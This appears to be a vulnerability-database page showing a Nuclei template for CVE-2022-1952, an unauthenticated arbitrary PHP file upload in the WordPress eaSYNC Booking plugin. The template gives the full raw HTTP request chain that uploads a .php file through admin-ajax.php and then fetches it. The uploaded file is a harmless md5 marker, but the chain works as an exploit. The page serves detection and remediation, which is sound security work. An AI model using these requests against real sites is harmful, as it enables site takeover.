| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2022-1952 | 11 Jul 202213:15 | ā | attackerkb | |
| CVE-2022-1952 | 30 Jun 202209:48 | ā | circl | |
| WordPress plugin Free Booking Plugin for Hotels, Restaurant and Car Rental 代ē é®é¢ę¼ę“ | 11 Jul 202200:00 | ā | cnnvd | |
| WordPress Hotels/Restaurant/Car Rental Free Booking plugin Arbitrary File Upload Vulnerability | 13 Jul 202200:00 | ā | cnvd | |
| CVE-2022-1952 | 11 Jul 202212:56 | ā | cve | |
| CVE-2022-1952 eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload | 11 Jul 202212:56 | ā | cvelist | |
| CVE-2022-1952 | 11 Jul 202213:15 | ā | nvd | |
| CVE-2022-1952 | 11 Jul 202213:15 | ā | osv | |
| WordPress eaSYNC plugin <= 1.1.15 - Unauthenticated Arbitrary File Upload vulnerability | 15 Jun 202200:00 | ā | patchstack | |
| Input validation | 11 Jul 202213:15 | ā | prion |
id: CVE-2022-1952
info:
name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could result in remote code execution, allowing an attacker to take complete control of the affected WordPress site.
remediation: |
Update to the latest version of the WordPress eaSYNC Booking plugin (1.1.16) or apply the vendor-provided patch to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
- https://wordpress.org/plugins/easync-booking/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1952
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/cyllective/CVEs
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1952
cwe-id: CWE-434
epss-score: 0.17572
epss-percentile: 0.96762
cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: syntactics
product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental
framework: wordpress
tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics,vkev,vuln
variables:
string: "CVE-2022-1952"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059
--------------------------98efee55508c5059
Content-Disposition: form-data; name="action"
easync_session_store
--------------------------98efee55508c5059
Content-Disposition: form-data; name="type"
car
--------------------------98efee55508c5059
Content-Disposition: form-data; name="with_driver"
self-driven
--------------------------98efee55508c5059
Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
<?php echo md5("{{string}}");unlink(__FILE__);?>
--------------------------98efee55508c5059--
- |
GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
- |
GET /wp-content/uploads/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body_3
words:
- '{{md5(string)}}'
extractors:
- type: regex
name: filename
group: 1
regex:
- 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
internal: true
# digest: 4a0a0047304502202428917bee934978708bb93be5de812f10d928328cf771c3f8971921fec3163a022100850d278a40cd1e915150e50077f07cc7f8c2ba68490aeedf6ee1bd184f1f83d0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation